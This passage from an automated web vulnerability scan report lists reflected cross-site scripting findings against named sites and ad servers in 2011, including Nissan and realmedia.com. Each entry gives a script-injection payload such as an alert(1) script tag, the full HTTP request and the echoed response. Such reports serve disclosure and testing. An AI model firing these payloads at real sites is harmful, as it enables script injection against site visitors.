Path:	/cmadj/cm.rev_bostonherald/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 186e2'-alert(1)-'9de2a10529b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/cm.rev_bostonherald/;sz=186e2'-alert(1)-'9de2a10529b HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

4.646. http://local.nissanusa.com/zip.aspx [vehicle parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/zip.aspx

Issue detail

The value of the vehicle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e4e1"><script>alert(1)</script>e67eb90c86a was submitted in the vehicle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /zip.aspx?regionalZipCode=null&vehicle=versa-hatchback1e4e1"><script>alert(1)</script>e67eb90c86a&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Fri, 28 Jan 2011 16:59:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:59:39 GMT
Content-Length: 16017
Connection: close
Set-Cookie: PHPSESSID=t7cgpte7k894phrrjtaofv1dj7; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="vehicle" value="versa-hatchback1e4e1"><script>alert(1)</script>e67eb90c86a" />
...[SNIP]...

4.647. http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx [vary parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://main.oggifinogi.com
Path:	/OggiPlayerService/PlayerProxy.aspx

Issue detail

The value of the vary request parameter is copied into the HTML document as plain text between tags. The payload 1e90e<img%20src%3da%20onerror%3dalert(1)>871ea2c5bb2 was submitted in the vary parameter. This input was echoed as 1e90e<img src=a onerror=alert(1)>871ea2c5bb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /OggiPlayerService/PlayerProxy.aspx?id=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&vary=1e90e<img%20src%3da%20onerror%3dalert(1)>871ea2c5bb2&getLoader=true HTTP/1.1
Host: main.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:45:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-From-Cache: False
Cache-Control: public
Last-Modified: Wed, 17 Nov 2010 19:11:59 GMT
ETag: MjAxMC0xMS0xNyAxOToxMTo1OQ==
Vary: *
Content-Type: application/x-javascript
Content-Length: 12228

OggiResponse='\1\1<html xmlns="http://www.w3.org/1999/xhtml">\1<head id="PlayerHead"><title>\1 Player\1</title>\1 <style type="text/css">\1 .hand {cursor:pointer}\1 </style>\1 <!--[if
...[SNIP]...
7b24386-4c5b-4ca7-8b27-6adc092e2aef&vary=1e90e%3Cimg%20src%3da%20onerror%3dalert(1)%3E871ea2c5bb2&getLoader=true&PlayerTemplateId=fad07670-f49f-4829-b06b-1f566c5dd03b", "oggiPlayerDiv728x600"\1 ,\'1e90e<img src=a onerror=alert(1)>871ea2c5bb2\'\1 ,\'true\'\1 );\1 } \1 else {\1 PlayerLoader.InitInNewWindow(\1 {Context}.ContextId, \1 "http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx?id=
...[SNIP]...

4.648. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mig.nexac.com
Path:	/2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad590"><script>alert(1)</script>9326a51b31a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMad590"><script>alert(1)</script>9326a51b31a/DLX/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:59:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DMad590"><script>alert(1)</script>9326a51b31a/DLX/904019383/x96/default/empty.gif/726348573830302b4b504d4141664364?x" target="_top"><IMG SRC=
...[SNIP]...

4.649. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mig.nexac.com
Path:	/2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e5b4"><script>alert(1)</script>109944f53ee was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX9e5b4"><script>alert(1)</script>109944f53ee/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:00:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX9e5b4"><script>alert(1)</script>109944f53ee/443123410/x96/default/empty.gif/726348573830302b4b504d4141664364?x" target="_top"><IMG SRC=
...[SNIP]...

4.650. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mig.nexac.com
Path:	/2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6adea"><script>alert(1)</script>15e3466ad2a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x966adea"><script>alert(1)</script>15e3466ad2a HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:00:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX/2057134891/x966adea"><script>alert(1)</script>15e3466ad2a/default/empty.gif/726348573830302b4b504d4141664364?x" target="_top"><IMG SRC
...[SNIP]...

4.651. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mx.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bb54'-alert(1)-'7c77be0c2b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?9bb54'-alert(1)-'7c77be0c2b9=1 HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=af143dyttqznmg552yp4pnmv; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=af143dyttqznmg552yp4pnmv; path=/; HttpOnly
Set-Cookie: spvdr=vd=a7e3d806-3337-4a1b-9339-464061ff6408&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:17 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:17 GMT
Connection: close
Content-Length: 19093
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=mx.imlive.com&ul=/?9bb54'-alert(1)-'7c77be0c2b9=1&qs=9bb54'-alert(1)-'7c77be0c2b9=1&qs=9bb54'-alert(1)-'7c77be0c2b9=1&iy=dallas&id=44&iu=1&vd=a7e3d806-3337-4a1b-9339-464061ff6408';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.652. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mx.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601d8"><a>9322a6cdc6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?601d8"><a>9322a6cdc6e=1 HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fvqwrzet5puogjqpwavrxj3x; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=fvqwrzet5puogjqpwavrxj3x; path=/; HttpOnly
Set-Cookie: spvdr=vd=79ce1b5f-ccb1-46f8-b915-4f1fe4dd4ae4&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:15 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:14 GMT
Connection: close
Content-Length: 18918
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||601d8"><a>9322a6cdc6e~1');return false;">
...[SNIP]...

4.653. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcfb3"><script>alert(1)</script>3d6205c4976 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmediabcfb3"><script>alert(1)</script>3d6205c4976/Retarget_Secure/122237937@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O1012Mr|O3016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 398
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:42 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmediabcfb3"><script>alert(1)</script>3d6205c4976/Retarget_Secure/1463364920/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.654. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 821d4"><script>alert(1)</script>35018ed4335 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure821d4"><script>alert(1)</script>35018ed4335/122237937@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O1012Mr|O3016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:51 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure821d4"><script>alert(1)</script>35018ed4335/L18/1378154155/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?1378154155" TARGET=_blank>

4.655. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8767b"><script>alert(1)</script>739eb1cf5ec was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom38767b"><script>alert(1)</script>739eb1cf5ec?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O1012Mr|O3016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 389
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:00 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/414116622/Bottom38767b"><script>alert(1)</script>739eb1cf5ec/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.656. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3 [_RM_HTML_MM_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64be6"-alert(1)-"dc3b028ab21 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3?_RM_HTML_MM_=10115500001000051100164be6"-alert(1)-"dc3b028ab21 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O1012Mr|O3016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:46:39 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|R10M5V|R10M5b|R10M5d|R10M5l|R10M5x|R10M62|R10M69|O1012Mr|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 601
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:37:41 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "10115500001000051100164be6"-alert(1)-"dc3b028ab21";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.657. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b702d"><script>alert(1)</script>58724ec2a5d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmediab702d"><script>alert(1)</script>58724ec2a5d/Retarget_Secure/243052316@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
